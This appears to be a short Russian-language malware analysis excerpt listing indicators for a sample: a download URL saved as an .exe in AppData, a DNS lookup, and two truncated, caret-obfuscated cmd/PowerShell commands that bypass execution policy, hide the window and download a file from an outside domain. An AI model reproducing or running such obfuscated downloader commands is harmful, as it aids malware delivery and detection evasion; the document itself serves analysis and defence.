Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powers^H^ELl^.e^xE^ -^eXEcU^TI^onP^O^Li^cY byP^a^Ss^ -Nop^rOfI^le -^WiNd^oWs^tYle hi^dd^EN (n^EW-oB^J^e^cT ^sy^Stem.Net.^wE^B^C^l^IEN^t^).DowNL^oADF^i^L^e('http://www.fopeioaas....
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "powers^H^ELl^.e^xE^ -^eXEcU^TI^onP^O^Li^cY byP^a^Ss^ -Nop^rOfI^le -^WiNd^oWs^tYle hi^dd^EN (n^EW-oB^J^e^cT ^sy^Stem.Net.^wE^B^C^l^IEN^t^).DowNL^oADF^i^L^e('http://www.fopeioaas....' (со скрытым окном)